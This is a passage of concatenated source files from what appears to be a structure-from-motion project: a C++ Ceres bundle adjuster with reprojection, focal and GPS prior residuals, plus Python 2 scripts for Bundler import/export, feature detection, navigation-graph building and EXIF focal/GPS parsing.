// Camera block: [focal, k1, k2]; the principal point is not modeled (it is
// assumed to lie at the image center). Shot block: [rx, ry, rz, tx, ty, tz]
// (angle-axis rotation followed by translation). The 2D residual is the
// projection error scaled by 1 / (std_deviation * sqrt(2)).
struct SnavelyReprojectionError {
  SnavelyReprojectionError(double observed_x, double observed_y, double std_deviation)
      : observed_x_(observed_x)
      , observed_y_(observed_y)
      , scale_(1.0 / std_deviation / sqrt(2))
  {}

  template <typename T>
  bool operator()(const T* const camera,
                  const T* const shot,
                  const T* const point,
                  T* residuals) const {
    // Rotate the world point into the camera frame (shot[0..2] is the
    // angle-axis rotation), then translate by shot[3..5].
    T camera_point[3];
    ceres::AngleAxisRotatePoint(shot, point, camera_point);
    for (int axis = 0; axis < 3; ++axis) {
      camera_point[axis] += shot[3 + axis];
    }

    // Perspective division onto the normalized image plane.
    const T x_normalized = camera_point[0] / camera_point[2];
    const T y_normalized = camera_point[1] / camera_point[2];

    // Second- and fourth-order radial distortion.
    const T& k1 = camera[1];
    const T& k2 = camera[2];
    const T r_squared = x_normalized * x_normalized + y_normalized * y_normalized;
    const T distortion_factor = T(1.0) + r_squared * (k1 + k2 * r_squared);

    // Scale by the focal length to obtain the final projected position.
    const T& focal = camera[0];
    const T projected_x = focal * distortion_factor * x_normalized;
    const T projected_y = focal * distortion_factor * y_normalized;

    // Scaled difference between prediction and observation.
    residuals[0] = T(scale_) * (projected_x - T(observed_x_));
    residuals[1] = T(scale_) * (projected_y - T(observed_y_));
    return true;
  }

  double observed_x_;
  double observed_y_;
  double scale_;
};
// Prior residual that pulls the optimized focal length towards a given
// estimate (typically derived from EXIF):
//   residual = (focal - estimate) / (std_deviation * sqrt(2))
struct FocalPriorError {
  FocalPriorError(double estimate, double std_deviation)
      : estimate_(estimate)
      , scale_(1.0 / std_deviation / sqrt(2))
  {}

  // Only the first entry of the supplied parameter block (the focal
  // length) is read.
  template <typename T>
  bool operator()(const T* const focal, T* residuals) const {
    const T difference = *focal - T(estimate_);
    residuals[0] = T(scale_) * difference;
    return true;
  }

  double estimate_;
  double scale_;
};
// Prior residual tying a shot's (negated, rotated) translation to its GPS
// position, scaled by 1 / (std_deviation * sqrt(2)).
struct GPSPriorError {
  GPSPriorError(double x, double y, double z, double std_deviation)
      : x_(x), y_(y), z_(z)
      , scale_(1.0 / std_deviation / sqrt(2))
  {}

  template <typename T>
  bool operator()(const T* const shot, T* residuals) const {
    // shot[0..2] is the angle-axis rotation, shot[3..5] the translation.
    // NOTE(review): the optical center is conventionally -R^T * t, while
    // this rotates t by +R before negating -- confirm the intended sign
    // convention before re-enabling this residual.
    T rotated_translation[3];
    ceres::AngleAxisRotatePoint(shot, shot + 3, rotated_translation);
    const T gps[3] = { T(x_), T(y_), T(z_) };
    for (int axis = 0; axis < 3; ++axis) {
      residuals[axis] = T(scale_) * (-rotated_translation[axis] - gps[axis]);
    }
    return true;
  }

  double x_, y_, z_;
  double scale_;
};
// Indices of the entries inside a BACamera parameter block.
enum {
  BA_CAMERA_FOCAL,       // Focal length.
  BA_CAMERA_K1,          // Second-order radial distortion coefficient.
  BA_CAMERA_K2,          // Fourth-order radial distortion coefficient.
  BA_CAMERA_NUM_PARAMS   // Number of camera parameters.
};
// Camera intrinsics block used by BundleAdjuster.
struct BACamera {
  double parameters[BA_CAMERA_NUM_PARAMS];  // [focal, k1, k2]
  bool constant;      // When true the block is held fixed during Run().
  double exif_focal;  // Focal prior (from EXIF) used by FocalPriorError.
  std::string id;     // Lookup key in BundleAdjuster::cameras_.

  double GetFocal() { return parameters[BA_CAMERA_FOCAL]; }
  double GetK1() { return parameters[BA_CAMERA_K1]; }
  double GetK2() { return parameters[BA_CAMERA_K2]; }
  void SetFocal(double v) { parameters[BA_CAMERA_FOCAL] = v; }
  void SetK1(double v) { parameters[BA_CAMERA_K1] = v; }
  void SetK2(double v) { parameters[BA_CAMERA_K2] = v; }
};
// Indices of the entries inside a BAShot parameter block.
enum {
  BA_SHOT_RX,          // Angle-axis rotation, x component.
  BA_SHOT_RY,          // Angle-axis rotation, y component.
  BA_SHOT_RZ,          // Angle-axis rotation, z component.
  BA_SHOT_TX,          // Translation, x component.
  BA_SHOT_TY,          // Translation, y component.
  BA_SHOT_TZ,          // Translation, z component.
  BA_SHOT_NUM_PARAMS   // Number of shot parameters.
};
// Per-shot pose block (angle-axis rotation + translation) plus GPS prior
// data, used by BundleAdjuster.
struct BAShot {
  double parameters[BA_SHOT_NUM_PARAMS];  // [rx, ry, rz, tx, ty, tz]
  bool constant;             // When true the block is held fixed during Run().
  double gps_x, gps_y, gps_z;  // GPS position prior (used by GPSPriorError).
  double gps_dop;            // GPS dilution of precision (prior std dev input).
  int exif_orientation;      // EXIF orientation flag.
  std::string camera;        // Id of the camera this shot was taken with.
  std::string id;            // Lookup key in BundleAdjuster::shots_.

  double GetRX() { return parameters[BA_SHOT_RX]; }
  double GetRY() { return parameters[BA_SHOT_RY]; }
  double GetRZ() { return parameters[BA_SHOT_RZ]; }
  double GetTX() { return parameters[BA_SHOT_TX]; }
  double GetTY() { return parameters[BA_SHOT_TY]; }
  double GetTZ() { return parameters[BA_SHOT_TZ]; }
  void SetRX(double v) { parameters[BA_SHOT_RX] = v; }
  void SetRY(double v) { parameters[BA_SHOT_RY] = v; }
  void SetRZ(double v) { parameters[BA_SHOT_RZ] = v; }
  void SetTX(double v) { parameters[BA_SHOT_TX] = v; }
  void SetTY(double v) { parameters[BA_SHOT_TY] = v; }
  void SetTZ(double v) { parameters[BA_SHOT_TZ] = v; }
};
// 3D point block used by BundleAdjuster.
struct BAPoint {
  double coordinates[3];  // [x, y, z]
  bool constant;          // When true the block is held fixed during Run().
  std::string id;         // Lookup key in BundleAdjuster::points_.

  double GetX() { return coordinates[0]; }
  double GetY() { return coordinates[1]; }
  double GetZ() { return coordinates[2]; }
  void SetX(double v) { coordinates[0] = v; }
  void SetY(double v) { coordinates[1] = v; }
  void SetZ(double v) { coordinates[2] = v; }
};
// A single 2D observation linking a point to the shot/camera that saw it.
// The pointers reference entries owned by BundleAdjuster's maps.
struct BAObservation {
  double coordinates[2];  // Observed 2D image position.
  BACamera *camera;
  BAShot *shot;
  BAPoint *point;
};
// A bundle adjustment class for optimizing the problem
//
// sum_p ( reprojection_error(p) / reprojection_error_sd )^2 / 2
// + sum_c ( (focal - focal_prior) / focal_prior_sd )^2 / 2
//
class BundleAdjuster {
public:
BundleAdjuster() {
reprojection_error_sd_ = 1;
focal_prior_sd_ = 1;
}
virtual ~BundleAdjuster() {}
BACamera GetCamera(const std::string &id) {
return cameras_[id];
}
BAShot GetShot(const std::string &id) {
return shots_[id];
}
BAPoint GetPoint(const std::string &id) {
return points_[id];
}
void AddCamera(
const std::string &id,
double focal,
double k1,
double k2,
double exif_focal,
bool constant) {
BACamera c;
c.id = id;
c.parameters[BA_CAMERA_FOCAL] = focal;
c.parameters[BA_CAMERA_K1] = k1;
c.parameters[BA_CAMERA_K2] = k2;
c.constant = constant;
c.exif_focal = exif_focal;
cameras_[id] = c;
}
void AddShot(
const std::string &id,
const std::string &camera,
double rx,
double ry,
double rz,
double tx,
double ty,
double tz,
double gpsx,
double gpsy,
double gpsz,
double gps_dop,
bool constant) {
BAShot s;
s.id = id;
s.camera = camera;
s.parameters[BA_SHOT_RX] = rx;
s.parameters[BA_SHOT_RY] = ry;
s.parameters[BA_SHOT_RZ] = rz;
s.parameters[BA_SHOT_TX] = tx;
s.parameters[BA_SHOT_TY] = ty;
s.parameters[BA_SHOT_TZ] = tz;
s.constant = constant;
s.gps_x = gpsx;
s.gps_y = gpsy;
s.gps_z = gpsz;
s.gps_dop = gps_dop;
shots_[id] = s;
}
void AddPoint(
const std::string &id,
double x,
double y,
double z,
bool constant) {
BAPoint p;
p.id = id;
p.coordinates[0] = x;
p.coordinates[1] = y;
p.coordinates[2] = z;
p.constant = constant;
points_[id] = p;
}
void AddObservation(
const std::string &shot,
const std::string &point,
double x,
double y) {
BAObservation o;
o.shot = &shots_[shot];
o.camera = &cameras_[o.shot->camera];
o.point = &points_[point];
o.coordinates[0] = x;
o.coordinates[1] = y;
observations_.push_back(o);
}
void SetLossFunction(const std::string &function_name,
double threshold) {
loss_function_ = function_name;
loss_function_threshold_ = threshold;
}
void SetReprojectionErrorSD(double sd) {
reprojection_error_sd_ = sd;
}
void SetFocalPriorSD(double sd) {
focal_prior_sd_ = sd;
}
void Run() {
ceres::LossFunction *loss;
if (loss_function_.compare("TruncatedLoss") == 0) {
loss = new TruncatedLoss(loss_function_threshold_);
} else if (loss_function_.compare("TrivialLoss") == 0) {
loss = new ceres::TrivialLoss();
} else if (loss_function_.compare("HuberLoss") == 0) {
loss = new ceres::HuberLoss(loss_function_threshold_);
} else if (loss_function_.compare("SoftLOneLoss") == 0) {
loss = new ceres::SoftLOneLoss(loss_function_threshold_);
} else if (loss_function_.compare("CauchyLoss") == 0) {
loss = new ceres::CauchyLoss(loss_function_threshold_);
} else if (loss_function_.compare("ArctanLoss") == 0) {
loss = new ceres::ArctanLoss(loss_function_threshold_);
}
// Create residuals for each observation in the bundle adjustment problem. The
// parameters for cameras and points are added automatically.
ceres::Problem problem;
for (int i = 0; i < observations_.size(); ++i) {
// Each Residual block takes a point and a camera as input and outputs a 2
// dimensional residual. Internally, the cost function stores the observed
// image location and compares the reprojection against the observation.
ceres::CostFunction* cost_function =
new ceres::AutoDiffCostFunction<SnavelyReprojectionError, 2, 3, 6, 3>(
new SnavelyReprojectionError(observations_[i].coordinates[0],
observations_[i].coordinates[1],
reprojection_error_sd_));
problem.AddResidualBlock(cost_function,
loss,
observations_[i].camera->parameters,
observations_[i].shot->parameters,
observations_[i].point->coordinates);
}
for (auto &i : cameras_) {
ceres::CostFunction* cost_function =
new ceres::AutoDiffCostFunction<FocalPriorError, 1, 3>(
new FocalPriorError(i.second.exif_focal, focal_prior_sd_));
problem.AddResidualBlock(cost_function,
NULL,
i.second.parameters);
}
// for (auto &i : shots_) {
// ceres::CostFunction* cost_function =
// new ceres::AutoDiffCostFunction<GPSPriorError, 3, 6>(
// new GPSPriorError(i.second.gps_position[0],
// i.second.gps_position[1],
// i.second.gps_position[2],
// i.second.gps_dop));
// problem.AddResidualBlock(cost_function,
// NULL,
// i.second.parameters);
// }
// Set constant parameter blocks.
for (auto &i : cameras_) {
if (i.second.constant) {
problem.SetParameterBlockConstant(i.second.parameters);
}
}
for (auto &i : shots_) {
if (i.second.constant) {
problem.SetParameterBlockConstant(i.second.parameters);
}
}
for (auto &i : points_) {
if (i.second.constant) {
problem.SetParameterBlockConstant(i.second.coordinates);
}
}
// Solve
ceres::Solver::Options options;
options.linear_solver_type = ceres::SPARSE_SCHUR;
options.num_threads = 8;
options.num_linear_solver_threads = 8;
ceres::Solve(options, &problem, &last_run_summary_);
}
std::string BriefReport() {
return last_run_summary_.BriefReport();
}
std::string FullReport() {
return last_run_summary_.FullReport();
}
private:
std::map<std::string, BACamera> cameras_;
std::map<std::string, BAShot> shots_;
std::map<std::string, BAPoint> points_;
std::vector<BAObservation> observations_;
std::string loss_function_;
double loss_function_threshold_;
double reprojection_error_sd_;
double focal_prior_sd_;
ceres::Solver::Summary last_run_summary_;
};
<file_sep># -*- coding: utf-8 -*-
import os

# Absolute path of the project root (one level above this file's directory).
abspath = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
# Location of the bundled camera sensor-width database (JSON).
SENSOR = os.path.join(abspath, 'share/opensfm/sensor_data.json')
<file_sep>import os
import argparse
import cv2
import json
import numpy as np
import errno
# (TODO): ensure the image order from OpenSfM is the same as Bundler
# (TODO): ensure the coordinate systems are consistent
def export_bundler(image_list, reconstructions, track_graph, bundle_file_path, list_file_path):
    """
    Generate a reconstruction file that is consistent with Bundler's format

    Writes one bundle_rNNN.out / list_rNNN.out pair per reconstruction.
    (Python 2 code: relies on dict.iteritems and xrange.)
    """
    if not os.path.exists(bundle_file_path): os.makedirs(bundle_file_path)
    if not os.path.exists(list_file_path): os.makedirs(list_file_path)

    for j, reconstruction in enumerate(reconstructions):
        lines = []
        lines.append("# Bundle file v0.3")
        points = reconstruction['points']
        shots = reconstruction['shots']
        cameras = reconstruction['cameras']
        num_point = len(points)
        num_shot = len(image_list)
        lines.append(' '.join(map(str, [num_shot, num_point])))
        # Shot index in the Bundler file equals the image's position in image_list.
        shots_order = {key: i for i, key in enumerate(image_list)}

        # cameras
        for shot_id in image_list:
            if shot_id in shots:
                shot = shots[shot_id]
                camera = cameras[shot['camera']]
                # Denormalize the focal length by the larger image dimension.
                scale = max(camera['width'], camera['height'])
                focal = camera['focal'] * scale
                k1 = camera['k1']
                k2 = camera['k2']
                R, t = shot['rotation'], shot['translation']
                R = cv2.Rodrigues(np.array(R))[0]
                R[1], R[2] = -R[1], -R[2]  # Reverse y and z
                t[1], t[2] = -t[1], -t[2]
                lines.append(' '.join(map(str, [focal, k1, k2])))
                for i in xrange(3): lines.append(' '.join(list(map(str, R[i]))))
                t = ' '.join(map(str, t))
                lines.append(t)
            else:
                # Shots not in this reconstruction get an all-zero placeholder
                # (focal/k line + 3 rotation rows + translation = 5 lines).
                for i in range(5):
                    lines.append("0 0 0")

        # tracks
        for point_id, point in points.iteritems():
            coord = point['coordinates']
            color = map(int, point['color'])
            view_list = track_graph[point_id]
            lines.append(' '.join(map(str, coord)))
            lines.append(' '.join(map(str, color)))
            view_line = []
            for shot_key, view in view_list.iteritems():
                if shot_key in shots.keys():
                    v = view['feature']
                    shot_index = shots_order[shot_key]
                    camera = shots[shot_key]['camera']
                    scale = max(cameras[camera]['width'], cameras[camera]['height'])
                    # Denormalize the feature position and flip y.
                    x = v[0] * scale
                    y = -v[1] * scale
                    view_line.append(' '.join(map(str, [shot_index, view['feature_id'], x, y])))
            lines.append(str(len(view_line)) + ' ' + ' '.join(view_line))

        bundle_file =os.path.join(bundle_file_path, 'bundle_r'+str(j).zfill(3)+'.out')
        with open(bundle_file, 'wb') as fout:
            fout.writelines('\n'.join(lines) + '\n')

        list_file =os.path.join(list_file_path, 'list_r'+str(j).zfill(3)+'.out')
        with open(list_file, 'wb') as fout:
            fout.writelines('\n'.join(map(str, image_list)))
def import_bundler(data_path, bundle_file, list_file, track_file, reconstruction_file=None):
    """
    Return a reconstruction dict and a track graph file (track.csv) compatible with OpenSfM from a Bundler output

    (Python 2 code: relies on xrange and map returning lists.)
    """
    # (TODO): handle cameras with exif info in reconstruction['cameras']
    # camera model
    # image width/height for denormalizing coordinates, principle point

    # Init OpenSfM working folder.
    mkdir_p(data_path)

    # Copy image list.
    list_dir = os.path.dirname(list_file)
    with open(list_file, 'rb') as fin:
        lines = fin.read().splitlines()
    ordered_shots = []
    image_list = []
    for line in lines:
        # Image paths in the Bundler list are relative to the list file.
        image_path = os.path.join(list_dir, line.split()[0])
        rel_to_data = os.path.relpath(image_path, data_path)
        image_list.append(rel_to_data)
        ordered_shots.append(os.path.basename(image_path))
    with open(os.path.join(data_path, 'image_list.txt'), 'w') as fout:
        fout.write('\n'.join(image_list) + '\n')

    # Check for bundle_file
    if not bundle_file or not os.path.isfile(bundle_file):
        return None

    with open(bundle_file, 'rb') as fin:
        lines = fin.readlines()
    # Skip the "# Bundle file v0.3" comment line when present.
    offset = 1 if '#' in lines[0] else 0

    # header
    num_shot, num_point = map(int, lines[offset].split(' '))
    offset += 1

    # initialization
    reconstruction = {}
    reconstruction['cameras'] = {}
    reconstruction['shots'] = {}
    reconstruction['points'] = {}
    track_graph = {}

    # cameras: each shot occupies 5 lines (focal/k1/k2, 3 rotation rows,
    # translation).
    for i in xrange(num_shot):
        # Creating a model for each shot for now.
        # TODO: create mdoel based on exif
        shot_key = ordered_shots[i]
        focal, k1, k2 = map(float, lines[offset].rstrip('\n').split(' '))
        if focal > 0:
            camera_name = 'camera_' + str(i)
            # Read the image to recover width/height for normalization.
            im = cv2.imread(os.path.join(data_path, image_list[i]))
            height, width = im.shape[0:2]
            scale = float(max(height, width))
            focal = focal / scale
            reconstruction['cameras'][camera_name] = {'focal': focal, 'k1': k1, 'k2': k2, 'width': width, 'height': height}

            # Shots
            rline = []
            for k in xrange(3): rline += lines[offset+1+k].rstrip('\n').split(' ')
            R = ' '.join(rline)
            t = lines[offset+4].rstrip('\n').split(' ')
            R = np.array(map(float, R.split())).reshape(3,3)
            t = np.array(map(float, t))
            R[1], R[2] = -R[1], -R[2]  # Reverse y and z
            t[1], t[2] = -t[1], -t[2]
            reconstruction['shots'][shot_key] = {
                'camera' : camera_name,
                'rotation': list(cv2.Rodrigues(R)[0].flatten(0)),
                'translation': list(t)
            }
        else:
            # Shots Bundler failed to register have focal <= 0.
            print 'ignore failed image', shot_key
        offset += 5

    # tracks: each point occupies 3 lines (coordinates, color, view list).
    for i in xrange(num_point):
        track_lines = [] if i == 0 else track_lines  # NOTE(review): see below
        coordinates = lines[offset].rstrip('\n').split(' ')
        color = lines[offset+1].rstrip('\n').split(' ')
        reconstruction['points'][i] = {
            'coordinates': map(float, coordinates),
            'color': map(int, color)
        }
        view_line = lines[offset+2].rstrip('\n').split(' ')
        # num_view, view_list = int(view_line[0]), view_line[1:].rstrip('\n').split(' ')
        num_view, view_list = int(view_line[0]), view_line[1:]
        for k in xrange(num_view):
            # Views are stored as (shot_index, feature_id, x, y) quadruples.
            shot_key = ordered_shots[int(view_list[4*k])]
            camera_name = reconstruction['shots'][shot_key]['camera']
            scale = max(reconstruction['cameras'][camera_name]['width'], reconstruction['cameras'][camera_name]['height'])
            # Normalize coordinates back and flip y to OpenSfM's convention.
            v = '\t'.join([ shot_key,
                            str(i),
                            view_list[4*k + 1],
                            str(float(view_list[4*k + 2])/scale),
                            str(-float(view_list[4*k + 3])/scale)
                          ])
            track_lines.append(v)
        offset += 3

    # save track file
    with open(track_file, 'wb') as fout:
        fout.writelines('\n'.join(track_lines))

    # save reconstruction
    if reconstruction_file is not None:
        with open(reconstruction_file, 'wb') as fout:
            fout.write(json.dumps([reconstruction], indent=4))

    return reconstruction
def mkdir_p(path):
    '''Make a directory including parent directories.

    Behaves like ``mkdir -p``: an already-existing directory is silently
    accepted, while any other failure (e.g. a regular file in the way) is
    re-raised.
    '''
    try:
        os.makedirs(path)
    except os.error as exc:
        already_a_directory = exc.errno == errno.EEXIST and os.path.isdir(path)
        if not already_a_directory:
            raise
<file_sep>networkx
PyYAML
numpy
exifread
gpxpy
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import argparse
import time
import json
import numpy as np
import scipy.spatial.distance as dist
import networkx as nx
from opensfm import dataset, reconstruction
def vector2_angle(x1, y1, x2, y2):
    """ Calculates the signed angle between two vectors on the plane.

    :param x1: The x coordinate for the first vector
    :param y1: The y coordinate for the first vector
    :param x2: The x coordinate for the second vector
    :param y2: The y coordinate for the second vector
    :return: The angle from the second vector to the first, wrapped into
        [-pi, pi]
    """
    first_heading = np.arctan2(y1, x1)
    second_heading = np.arctan2(y2, x2)
    difference = first_heading - second_heading
    if difference > np.pi:
        return difference - 2 * np.pi
    if difference < -np.pi:
        return difference + 2 * np.pi
    return difference
def angle_diff(a1, a2):
    """ Calculates the element-wise difference between angles.

    :param a1: Array of angles (radians)
    :param a2: The angle (or array of angles) to subtract
    :return: The differences wrapped into [-pi, pi]
    """
    wrapped = a1 - a2
    above = wrapped > np.pi
    below = wrapped < -np.pi
    wrapped[above] -= 2 * np.pi
    wrapped[below] += 2 * np.pi
    return wrapped
def get_direction_turns_and_motion_angles(min_distance, max_distance, distances, position, direction, positions, directions):
    """ Select the positions within a distance band around a position and
    compute their angular relations to it.

    Positions whose distance to ``position`` lies strictly between
    ``min_distance`` and ``max_distance`` are selected and ordered by
    increasing distance. For each selected position the turn of its viewing
    direction and the angle of the motion towards it are computed, both
    relative to ``direction``.

    :param min_distance: Float specifying the minimum distance (exclusive).
    :param max_distance: Float specifying the maximum distance (exclusive).
    :param distances: The distances from every position to ``position``.
    :param position: The reference position.
    :param direction: The viewing direction at the reference position.
    :param positions: All positions.
    :param directions: All viewing directions.
    :return: Tuple of (distance-ordered indices, direction turns in radians,
        motion angles in radians relative to ``direction``).
    """
    # Indices inside the band, then reordered by increasing distance.
    band_indices = np.where((min_distance < distances) & (distances < max_distance))[0]
    ordered_indices = band_indices[np.argsort(distances[band_indices])]

    relative_motions = positions[ordered_indices] - position
    motion_angles = np.array(
        [vector2_angle(direction[0], direction[1], m[0], m[1]) for m in relative_motions],
        float)
    direction_turns = np.array(
        [vector2_angle(direction[0], direction[1], d[0], d[1]) for d in directions[ordered_indices]],
        float)
    return ordered_indices, direction_turns, motion_angles
def create_optical_center_graph(reconstructions, config):
    """Build a directed navigation graph between shots.

    Nodes are shot ids. An edge (a, b) carries the distance between the two
    optical centers as 'weight' and a 'direction' label (one of
    step_forward/backward/left/right, turn_left/right/u) describing how shot
    b relates to shot a's position and viewing direction.
    """
    # Gather the optical center and viewing direction of every shot.
    optical_centers = []
    viewing_directions = []
    shot_ids = []
    for r in reconstructions:
        for shot_id in r['shots'].keys():
            shot = r['shots'][shot_id]
            optical_centers.append(reconstruction.optical_center(shot))
            viewing_directions.append(reconstruction.viewing_direction(shot))
            shot_ids.append(shot_id)
    optical_centers = np.vstack(optical_centers)
    viewing_directions = np.vstack(viewing_directions)
    # Pairwise distance matrix between all optical centers.
    D = dist.squareform(dist.pdist(optical_centers))

    # Distance bands (scene units) and angular tolerances (radians).
    min_distance = config.get('nav_min_distance', 0.01)
    step_max_distance = config.get('nav_step_max_distance', 20)
    step_forward_viewing_threshold = config.get('nav_step_forward_view_threshold', 0.25)
    step_viewing_threshold = config.get('nav_step_view_threshold', 0.5)
    step_drift_threshold = config.get('nav_step_drift_threshold', 0.5)
    turn_max_distance = config.get('nav_turn_max_distance', 15)
    turn_viewing_threshold = config.get('nav_turn_view_threshold', 0.7)

    direction = 'direction'
    viewing = 'viewing'
    drift = 'drift'
    # Ideal motion angle plus tolerances for each step edge type.
    steps = {
        'step_forward': {direction: 0, viewing: step_forward_viewing_threshold, drift: step_drift_threshold},
        'step_backward': {direction: np.pi, viewing: 2 * step_viewing_threshold, drift: step_drift_threshold},
        'step_left': {direction: -np.pi / 2, viewing: 2 * step_viewing_threshold, drift: step_drift_threshold},
        'step_right': {direction: np.pi / 2, viewing: 2 * step_viewing_threshold, drift: step_drift_threshold}
    }
    # Ideal viewing-direction turn for each turn edge type.
    turns = {
        'turn_left': {direction: -np.pi / 2, viewing: turn_viewing_threshold},
        'turn_right': {direction: np.pi / 2, viewing: turn_viewing_threshold},
        'turn_u': {direction: np.pi, viewing: turn_viewing_threshold}
    }

    graph = nx.DiGraph()
    for i in range(0, D.shape[0]):
        distances = D[i, :]
        oc = optical_centers[i]
        vd = viewing_directions[i]

        # Candidate step targets within the step distance band,
        # closest first.
        ordered_indices, viewing_turns, motion_angles = get_direction_turns_and_motion_angles(
            min_distance, step_max_distance, distances, oc, vd, optical_centers, viewing_directions
        )
        for key in steps:
            step = steps[key]
            # Drift of the actual motion from the ideal step direction.
            motion_drift = angle_diff(motion_angles, step[direction])
            motion_drift = np.max(np.vstack((np.abs(motion_drift - viewing_turns), np.abs(motion_drift))), 0)
            step_indices = np.where((motion_drift < step[drift]) & (np.abs(viewing_turns) < step[viewing]))[0]
            if len(step_indices) > 0:
                # Candidates are distance-ordered, so take the closest match.
                step_index = ordered_indices[step_indices[0]]
                graph.add_edge(shot_ids[i], shot_ids[step_index], weight=distances[step_index], direction=key)

        # Candidate turn targets within the turn distance band.
        ordered_indices, viewing_turns, motion_angles = get_direction_turns_and_motion_angles(
            min_distance, turn_max_distance, distances, oc, vd, optical_centers, viewing_directions
        )
        for key in turns:
            turn = turns[key]
            viewing_diff = np.abs(angle_diff(viewing_turns, turn[direction]))
            turn_indices = np.where((viewing_diff < turn[viewing]))[0]
            if len(turn_indices) > 0:
                turn_index = ordered_indices[turn_indices[0]]
                graph.add_edge(shot_ids[i], shot_ids[turn_index], weight=distances[turn_index], direction=key)
    return graph
# Entry point: build the navigation graph for a dataset and save it.
if __name__ == "__main__":
    start = time.time()
    parser = argparse.ArgumentParser(description='Compute navigation graph from reconstruction')
    parser.add_argument('dataset',
                        help='path to the dataset to be processed')
    args = parser.parse_args()

    data = dataset.DataSet(args.dataset)
    recs = data.load_reconstruction()
    navigation_graphs = []

    rec_graph = create_optical_center_graph(recs, data.config)
    # NOTE(review): `.node` / `.edge` are the pre-2.0 networkx attribute
    # names -- confirm the pinned networkx version before upgrading.
    navigation_graph = {
        'edges': {},
        'nodes': list(rec_graph.node)
    }
    # Serialize the adjacency (edge attributes keyed by source node).
    for edge in rec_graph.edge:
        navigation_graph['edges'][edge] = rec_graph.edge[edge]
    navigation_graphs.append(navigation_graph)
    data.save_navigation_graph(navigation_graphs)

    # Record the wall time in the profile log.
    end = time.time()
    with open(data.profile_log(), 'a') as fout:
        fout.write('Navigation graphs: {0}\n'.format(end - start))
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import os, sys
import time
from multiprocessing import Pool
import numpy as np
from opensfm import dataset
from opensfm import features
from opensfm import multiview
def usage():
    # Print the command-line usage (Python 2 print statement) and exit 0.
    print 'USAGE: %s data_set_path' % sys.argv[0]
    sys.exit(0)
def detect(image):
    # Extract features for one image and cache them on disk. Skipped when a
    # feature index already exists. Relies on the module-level `data` and
    # `preemptive_max` globals set in __main__.
    print 'Extracting', data.feature_type().upper(), 'features for image', image
    if not data.feature_index_exists(image):
        p_unsorted, f_unsorted = features.extract_feature(data.image_as_array(image, grayscale=True), data.config)
        if len(p_unsorted) == 0:
            # No features found; nothing to save.
            return

        # camera = data.load_exif(image)
        # if 'gopro' in camera['camera'].lower():
        #     camera['focal'] = camera['focal_ratio']* np.max([camera['height'], camera['width']])
        #     p_unsorted[:,0:2] = multiview.undistort_points(camera, p_unsorted[:,0:2].T).T

        # Sort features by the size column (p[:, 2]) so the largest come
        # last; the preemptive subset keeps the `preemptive_max` largest.
        size = p_unsorted[:, 2]
        order = np.argsort(size)
        f_sorted = f_unsorted[order, :]
        p_sorted = p_unsorted[order, :]
        p_pre = p_sorted[-preemptive_max:]
        f_pre = f_sorted[-preemptive_max:]
        data.save_features(image, p_sorted, f_sorted)
        data.save_preemptive_features(image, p_pre, f_pre)
        # Build and persist the FLANN index over the sorted descriptors.
        index = features.build_flann_index(f_sorted, data.config)
        data.save_feature_index(image, index)
# Entry point: detect features for every image, serially or in parallel.
if __name__ == "__main__":
    if len(sys.argv) > 1:
        path = sys.argv[1]
    else:
        usage()

    data = dataset.DataSet(path)
    images = data.images()
    # Number of preemptive features kept per image (also read by detect()).
    preemptive_max = data.config.get('preemptive_max', 200)

    start = time.time()
    processes = data.config.get('processes', 1)
    if processes == 1:
        # Serial path avoids multiprocessing overhead for a single worker.
        for image in images:
            detect(image)
    else:
        p = Pool(processes)
        p.map(detect, images)
    end = time.time()
    # Record the wall time in the profile log.
    with open(data.profile_log(), 'a') as fout:
        fout.write('detect_features: {0}\n'.format(end - start))
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import json
import exifread
import numpy as np
from cv2 import imread
from opensfm.sensors import sensor_data
def eval_frac(value):
    """Convert an EXIF rational (object with ``num``/``den`` fields) to float."""
    numerator = float(value.num)
    denominator = float(value.den)
    return numerator / denominator
def gps_to_decimal(values, reference):
    """Convert EXIF GPS degrees/minutes/seconds rationals to decimal degrees.

    :param values: sequence of three rationals (degrees, minutes, seconds)
    :param reference: hemisphere letter; 'N'/'E' give a positive sign,
        anything else a negative one
    """
    degrees, minutes, seconds = (eval_frac(v) for v in values)
    sign = 1 if reference in 'NE' else -1
    return sign * (degrees + minutes / 60 + seconds / 3600)
def get_float_tag(tags, key):
    """Return the first value of an EXIF tag as a float, or None if absent."""
    if key not in tags:
        return None
    return float(tags[key].values[0])
def get_frac_tag(tags, key):
    """Return the first value of an EXIF tag as a float ratio, or None."""
    if key not in tags:
        return None
    return eval_frac(tags[key].values[0])
def compute_focal(focal_35, focal, sensor_width, sensor_string):
    """Derive the 35mm-equivalent focal length and the focal ratio.

    :param focal_35: focal length in 35mm-equivalent mm (0 when unknown)
    :param focal: real focal length in mm
    :param sensor_width: sensor width in mm, if known
    :param sensor_string: lower-case '<make> <model>' key into the sensor
        width database
    :return: tuple (focal_35, focal_ratio); both 0 when nothing can be derived
    """
    if focal_35 > 0:
        # 35mm film produces 36x24mm pictures, so the ratio is against 36mm.
        return focal_35, focal_35 / 36.0
    if not sensor_width:
        # Fall back to the sensor-width database keyed by make/model.
        sensor_width = sensor_data.get(sensor_string, None)
    if sensor_width and focal:
        focal_ratio = focal / sensor_width
        return 36.0 * focal_ratio, focal_ratio
    return 0, 0
def get_distortion(make, model, fmm35):
    """Return default radial distortion coefficients as a 5-element list.

    GoPro cameras get hard-coded calibration presets selected by their
    35mm-equivalent focal length; every other make gets zero distortion.

    :raises ValueError: for a GoPro focal length with no known preset
    """
    if 'gopro' not in make.lower():
        return [0., 0., 0., 0., 0.]

    # Calibration presets keyed by 35mm-equivalent focal length.
    gopro_presets = {
        20: [-0.37, 0.28, 0, 0, 0],  # GoPro Hero 3, 7MP medium
        15: [-0.32, 0.24, 0, 0, 0],  # GoPro Hero 3, 7MP wide
        23: [-0.38, 0.24, 0, 0, 0],  # GoPro Hero 2, 5MP medium
        16: [-0.39, 0.22, 0, 0, 0],  # GoPro Hero 2, 5MP wide
    }
    preset = gopro_presets.get(fmm35)
    if preset is None:
        raise ValueError("Unsupported f value.")
    return list(np.array(preset))
def sensor_string(make, model):
